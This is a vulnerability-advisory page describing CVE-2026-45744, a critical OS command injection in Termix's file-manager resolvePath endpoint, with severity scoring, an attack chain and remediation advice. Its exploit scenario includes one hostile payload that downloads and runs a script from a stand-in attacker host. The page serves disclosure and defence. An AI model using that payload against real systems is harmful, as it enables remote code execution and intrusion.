Skip to main content

Termix EUVDEUVD-2026-34873

| CVE-2026-45744 CRITICAL
OS Command Injection (CWE-78)
2026-06-05 GitHub_M
9.9
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Patch available
Jun 05, 2026 - 20:02 EUVD
Source Code Evidence Fetched
Jun 05, 2026 - 18:35 vuln.today
Analysis Generated
Jun 05, 2026 - 18:35 vuln.today

DescriptionGitHub Advisory

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/file_manager/ssh/resolvePath endpoint in Termix is vulnerable to OS command injection. The endpoint uses double-quote escaping for shell command construction, which does not prevent $(...) and backtick command substitution. Any authenticated user with an active File Manager SSH session can execute arbitrary commands on the connected remote host. Version 2.3.2 patches the issue.

AnalysisAI

Remote command execution in Termix web-based server management platform (versions prior to 2.3.2) allows any authenticated user with an active File Manager SSH session to execute arbitrary OS commands on the connected remote host via the GET /ssh/file_manager/ssh/resolvePath endpoint. The vulnerability stems from improper shell escaping that fails to neutralize $(...) and backtick command substitution, yielding a CVSS 9.9 critical rating with scope change. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Acquire low-privilege Termix credentials
Delivery
Authenticate to Termix web UI
Exploit
Open File Manager SSH session to target host
Install
Send crafted GET to /ssh/file_manager/ssh/resolvePath with $(...) payload
C2
Shell substitutes attacker command in resolvePath call
Execute
Arbitrary commands execute on remote SSH host
Impact
Establish persistence and pivot

Vulnerability AssessmentAI

Exploitation The attacker must (1) hold valid Termix authentication credentials at any privilege level (PR:L), (2) have an active File Manager SSH session already established to a target remote host, and (3) be able to reach the Termix web interface over the network (AV:N). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is high but contextualized by the PR:L (low-privilege authenticated) requirement and the need for an already-established File Manager SSH session - meaning an attacker must already hold valid Termix credentials and have configured an SSH target. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker obtains low-privilege Termix credentials (via phishing, credential stuffing, or as a legitimate but malicious internal user), logs into the Termix web UI, opens a File Manager session to any SSH host they are permitted to access, and issues a crafted GET request to /ssh/file_manager/ssh/resolvePath with a path parameter containing $(curl attacker.com/x.sh|sh) or backtick-wrapped commands. The injected payload executes on the remote SSH host under the SSH session user's privileges, allowing the attacker to deploy implants, exfiltrate data, or pivot deeper into the network. …
Remediation Vendor-released patch: upgrade to Termix 2.3.2 or later, available at https://github.com/Termix-SSH/Termix/releases/tag/release-2.3.2-tag with builds for Windows, Linux, and macOS. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Audit all Termix deployments to identify systems running versions prior to 2.3.2; document all user accounts holding SSH File Manager access and assess criticality of managed infrastructure. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Termix

View all
CVE-2025-59951 CRITICAL POC
9.1 Oct 01

Docker default credentials in Termix server management. PoC and patch available.

CVE-2026-22804 HIGH POC
8.0 Jan 12

Stored XSS in Termix File Manager (versions 1.7.0-1.9.0) allows attackers with SSH server access to execute arbitrary Ja

CVE-2026-45748 CRITICAL
9.8 Jun 05

OS command injection in Termix web-based server management platform prior to version 2.3.2 allows remote unauthenticated

CVE-2026-45746 CRITICAL
9.0 Jun 05

Cross-tenant remote code execution in Termix (web-based SSH/file management platform) prior to version 2.3.2 allows an a

CVE-2026-45750 CRITICAL
9.0 Jun 05

Command injection in Termix server management platform before version 2.3.2 allows authenticated users to execute arbitr

CVE-2026-42453 HIGH
8.7 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45749 HIGH
8.1 Jun 05

Authentication bypass of MFA in Termix versions prior to 2.3.2 allows an attacker who already holds a victim's account p

CVE-2026-45743 HIGH
8.1 Jun 05

Cross-tenant SSH session hijacking in Termix versions prior to 2.3.2 allows any authenticated user to fully control anot

CVE-2026-42452 HIGH
8.1 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45745 HIGH
8.0 Jun 05

Machine-in-the-middle interception of HTTPS traffic in Termix Desktop (Electron) starting at version 1.7.0 allows attack

Share

EUVD-2026-34873 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy